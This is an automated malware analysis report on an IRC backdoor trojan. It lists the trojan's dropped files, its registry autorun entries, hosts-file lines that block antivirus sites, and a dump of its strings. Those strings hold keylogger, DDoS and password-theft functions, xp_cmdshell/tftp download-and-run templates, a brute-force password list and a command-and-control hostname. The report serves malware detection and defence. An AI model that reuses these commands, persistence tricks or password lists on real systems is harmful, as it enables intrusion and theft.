Gen.Heur.MSIL.Androm.3_49ee5b907e

by malwarelabrobot on October 11th, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.MSIL.Androm.3 (B) (Emsisoft), Gen:Heur.MSIL.Androm.3 (AdAware), Rbot.YR, BackdoorIRC.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, IRCBot


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 49ee5b907e4b4b9d5aa0669d261f996b
SHA1: 6a05c73f19c6866da64a7d10b8e8593b70d85688
SHA256: e59820f41e2938495b4241d0832a432c432a4eea7a0c8ab35ba7a4d8767398b3
SSDeep: 12288:xD/Q56oYjW4ftG9 4UWMqBOgxnZKE1Xvvgf5UjzX:xD/5oYK4Es4UWMqVxnZr4f5sX
Size: 979039 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2011-04-25 19:48:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
IRCBot A bot can communicate with command and control servers via IRC channel.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224

The Trojan injects its code into the following process(es):

LOIC.exe:1316

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)

The process eohpsgi.exe:1660 makes changes in the file system.
The Trojan deletes the following file(s):

The process run.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)

The process Uncrypted.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

Registry activity

The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 AA DB 59 AA 83 B2 0D E3 86 81 DE 94 73 5D 5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"uncrypted.exe" = "Uncrypted"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"LOIC.exe" = "Low Orbit Ion Cannon"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process eohpsgi.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 09 F4 E3 AE 09 AE E3 6C 56 4C 61 12 CC 83 A4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process LOIC.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 8D 73 0C C0 DB 47 C3 A5 75 11 7D 86 3A 9E 45"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process run.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F9 04 63 DA B1 E3 BA 55 2F 7F 5A BD 98 AA B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process Uncrypted.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 5D C0 A2 A7 B7 24 11 7A 37 DD C9 D1 2B C3 7E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Run.exe" = "run"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
9dbe2c1a0f3360af6a9e24b2b303113d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\LOIC.exe
363307d3a54e1c2d1107b1f53e8844b1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uncrypted.exe
2e31f43c4028cf8520dca20a9cb8e55d c:\WINDOWS\system32\eohpsgi.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1122 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 virustotal.com
127.0.0.1 mcafee.com
127.0.0.1 avira.com
127.0.0.1 avast.com
127.0.0.1 symantec.com
127.0.0.1 clamwin.com
127.0.0.1 kaspersky.com
127.0.0.1 comodo.com
127.0.0.1 norton.com
127.0.0.1 avg.com
127.0.0.1 novirusthanks.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 viruschief.com
127.0.0.1 fortiguard.com
127.0.0.1 bitdefender.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 0.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename: test-new1.exe
Internal Name: test-new1.exe
File Version: 0.0.0.0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 963812 966656 5.0059 e7c9c24e1ce22d4d81c0915e48e87b42
.rsrc 974848 680 4096 0.476044 89bbd7bcd3f28ac346308cdebc72b7f0
.reloc 983040 12 4096 0.011373 b061c1f6fd5cfb56674648657757dc87

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

eohpsgi.exe_1660:

.text
`.rdata
@.data
.idata
.reloc
Invalid allocation size: %u bytes.
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
memory check error at 0xX = 0xX, should be 0xX.
%hs located at 0xX is %u bytes long.
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0xX.
Bad memory block found at 0xX.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0xX, subtype %x, %u bytes long.
normal block at 0xX, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
__MSVCRT_HEAP_SELECT
portuguese-brazilian
ntpass
NTPass
mssql
MSSQL
%s: %d,
Total: %d in %s.
[SCAN]: Current IP: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Failed to start server, error: <%d>.
[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
[HTTPD]: Failed to start server, error: <%d>.
%d.%d.%d.%d
sendto() socket failed. sent = %d <%d>.
[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: IP: %s, Port %d is open.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: Failed to start worker thread, error: <%d>.
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
CDKey
prvkey
Software\Microsoft\Windows\CurrentVersion
Microsoft Windows Product ID
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Global Operations
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Techland\Chrome
Chrome
base\mp\sof2key
nwncdkey.ini
Key1=
Key2=
Key3=
%s\%s
%s CD Key: (%s).
DCC SEND %s %i %i %i
[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).
\\%s\pipe\epmapper
[TFTP]: File transfer complete to IP: %s
[%s]: Exploiting IP: %s.
w[TFTP]: File transfer complete to IP: %s
ddos.syn
ddos.ack
ddos.random
[DDoS]: Send error: <%d>.
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[FINDFILE]: Searching for file: %s.
[FINDFILE]: Files found: %d.
Found: %s\%s
NTDLL.DLL
[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(no password)).
[FINDPASS]: Unable to find the password in memory.
[FINDPASS]: Unable to find Winlogon Process ID.
[FINDPASS]: Failed to enable Debug Privilege.
[FINDPASS]: Only supported on Windows NT/2000.
MSGINA
[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/%S).
[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(N/A)).
[HTTPD]: Error: server failed, returned: <%d>.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
[HTTPD]: Worker thread of server thread: %d.
[HTTPD]: Failed to start worker thread, error: <%d>.
PRIVMSG %s :Searching for: %s
<TITLE>Index of %s</TITLE>
<H1>Index of %s</H1>
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
Searching for: %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
%2.2d/%2.2d/M %2.2d:%2.2d %s
PRIVMSG %s :%-31s %-21s
<TD WIDTH="%d"><A HREF="
%s%s/
"><CODE>%s/</CODE></A>
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
PRIVMSG %s :%-31s %-21s (%s bytes)
"><CODE>%s</CODE></A>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
PRIVMSG %s :Found %s Files and %s Directories
%s %s HTTP/1.1
Referer: %s
Host: %s
[ICMP]: Error: socket() failed, returned: <%d>.
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[IDENTD]: Client connection from IP: %s:%d.
: USERID : UNIX : %s
[IDENTD]: Error: server failed, returned: <%d>.
PRIVMSG
%s %s :%s
[%d-%d-%d %d:%d:%d] %s
[KEYLOG]: %s
%s (Changed Windows: %s)
%s (Buffer full) (%s)
%s (Return) (%s)
kernel32.dll
ExitWindowsEx
GetAsyncKeyState
GetKeyState
advapi32.dll
RegOpenKeyExA
RegCreateKeyExA
RegCloseKey
gdi32.dll
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
icmp.dll
netapi32.dll
dnsapi.dll
iphlpapi.dll
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
avicap32.dll
Kernel32.dll failed. <%d>
User32.dll failed. <%d>
Advapi32.dll failed. <%d>
Gdi32.dll failed. <%d>
Ws2_32.dll failed. <%d>
Wininet.dll failed. <%d>
Icmp.dll failed. <%d>
Netapi32.dll failed. <%d>
Dnsapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Mpr32.dll failed. <%d>
Shell32.dll failed. <%d>
Odbc32.dll failed. <%d>
Avicap32.dll failed. <%d>
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
tftp -i %s get %s
\\%s\ipc$
%s Error: %s <%d>.
explorer.exe
%s %s
%sdel.bat
del "%s"
%%comspec%% /c %s %s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell '%s'
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
[NET]: %s service: '%s'.
[NET]: Error with service: '%s'. %s
[NET]: %s: No service specified.
The following Windows services are registered:
%s: %s (%s)
[NET]: %s share: '%s'.
[NET]: %s: Error with share: '%s'. %s
[NET]: %s: No share specified.
[NET]: Share list error: %s <%ld>
[NET]: %s username: '%s'.
[NET]: %s: Error with username: '%s'. %s
[NET]: %s: No username specified.
Account: %S
Full Name: %S
User Comment: %S
Comment: %S
Privilege Level: %s
Auth Flags: %d
Home Directory: %S
Parameters: %S
Password Age: %d
Bad Password Count: %d
Number of Logins: %d
Last Logon: %d
Last Logoff: %d
Logon Server: %S
Workstations: %S
Country Code: %d
User's Language: %d
Max. Storage: %d
Units Per Week: %d
[NET]: User list error: %s <%ld>
Total users found: %d.
This network request is not supported.
The operation is allowed only on the primary domain controller of the domain.
The password is shorter than required (or does not meet the password policy requirement.)
[NET]: %s <Server: %S> <Message: %S>
c$\windows\system32
%s\%s\%s
(no password)
[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
%s\ipc$
[FLUSHDNS]: Error getting ARP cache: <%d>.
[FLUSHDNS]: Not supported by this system.
[PING]: Error sending pings to %s.
[PING]: Finished sending pings to %s.
[UDP]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
%s (%d)
bot.neverup.asia
svchost.exe
system.txt
msconfig.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
password1
password
passwd
pass1234
1234567
12345678
123456789
1234567890
windows
login
loginpass
domainpass
domainpassword
dbpass
dbpassword
databasepass
databasepassword
sqlpassoainstall
winpass
%s %d "%s"
[IDENTD]: Server running on Port: 113.
[IDENTD]: Failed to start server, error: <%d>.
[MAIN]: Connected to %s.
PASS %s
NICK %s
USER %s 0 0 :%s
PONG %s
JOIN %s %s
USERHOST %s
MODE %s %s
[MAIN]: User %s logged out.
NOTICE %s :%s
NICK
:%s%s
[MAIN]: User: %s logged out.
[MAIN]: Joined channel: %s.
NOTICE %s :
VERSION %s
PING %s
[DCC]: Receive file: '%s' from user: %s.
[DCC]: Failed to start transfer thread, error: <%d>.
[DCC]: Receive file: '%s' failed from unauthorized user: %s.
[DCC]: Chat from user: %s.
[DCC]: Failed to start chat thread, error: <%d>.
[DCC]: Chat already active with user: %s.
[DCC]: Chat failed by unauthorized user: %s.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Your attempt has been logged.
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: Password accepted.
[MAIN]: User: %s logged in.
$rndnick
rndnick
[MAIN]: Random nick change: %s
[MAIN]: No user logged in at slot: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: %s
[SECURE]: %s system.
[SECURE]: Failed to start secure thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Failed to start server thread, error: <%d>.
rloginstop
[RLOGIND]
httpstop
[HTTPD]
TCP redirect
ddos.stop
udpstop
UDP flood
tftpstop
[TFTP]
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[LOG]: Failed to start listing thread, error: <%d>.
[PROCS]: Failed to start listing thread, error: <%d>.
getcdkeys
[CDKEYS]: Search completed.
[MAIN]: Uptime: %s.
opencmd
ocmd
[CMD]: Remote shell already running.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell ready.
cmdstop
[CMD]
-[Login List]-
%d. %s
[MAIN]: Login list complete.
[FLUSHDNS]: Failed to load dnsapi.dll.
rloginserver
rlogin
[RLOGIND]: Server listening on IP: %s:%d, Username: %s.
[RLOGIND]: Failed to start server thread, error: <%d>.
httpserver
[HTTPD]: Failed to start server thread, error: <%d>.
tftpserver
tftp
[TFTP]: Already running.
[TFTP]: Failed to start server thread, error: <%d>.
findpass
[FINDPASS]: Searching for password.
[FINDPASS]: Failed to start search thread, error: <%d>.
nick
[MAIN]: Nick changed to: '%s'.
join
[MAIN]: Joined channel: '%s'.
PART %s
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Stopped: %d thread(s).
[THREADS]: Killed thread: %s.
[THREADS]: Failed to kill thread: %s.
c_rndnick
[MAIN]: Prefix changed to: '%c'.
[SHELL]: File opened: %s
[SHELL]: Couldn't open file: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[PROC]: Process killed: %s
[PROC]: Failed to terminate process: %s
[PROC]: Process killed ID: %s
[PROC]: Failed to terminate process ID: %s
[FILE]: Deleted '%s'.
[DCC]: Send File: %s, User: %s.
[FILE]: List: %s
[VISIT]: URL: %s.
[VISIT]: Failed to start connection thread, error: <%d>.
mirccmd
[CMD]: Error sending to remote shell.
[CMD]: Commands: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file failed: %s
[IDENT]: Server stopped. (%d thread(s) stopped.)
keylog
[KEYLOG]: Already running.
[KEYLOG]: Key logger active.
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: No key logger thread found.
[NET]: Failed to load advapi32.dll or netapi32.dll.
[CAPTURE]: Screen capture saved to: %s.
[CAPTURE]: Driver #%d - %s - %s.
[CAPTURE]: Webcam capture saved to: %s.
[CAPTURE]: Error while capturing from webcam.
[CAPTURE]: Invalid parameters for webcam capture.
[CAPTURE]: Amateur video saved to: %s.
[CAPTURE]: Error while capturing amateur video from webcam.
%s %s %s :%s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s.
[MAIN]: Alias added: %s.
privmsg
[MAIN]: Privmsg: %s: %s.
ACTION %s
[MAIN]: Action: %s: %s.
MODE %s
[MAIN]: Mode change: %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
c_nick
[CLONE]: Nick (%s): %s
c_join
[MAIN]: Repeat: %s
[MAIN]: Repeat not allowed in command line: %s
%s%s.exe
[UPDATE]: Downloading update from: %s.
[UPDATE]: Failed to start download thread, error: <%d>.
[EXEC]: Couldn't execute file.
[EXEC]: Commands: %s
[FINDFILE]: Searching for file: %s in: %s.
[FINDFILE]: Failed to start search thread, error: <%d>.
[FILE]: Rename: '%s' to: '%s'.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Failed to start clone thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
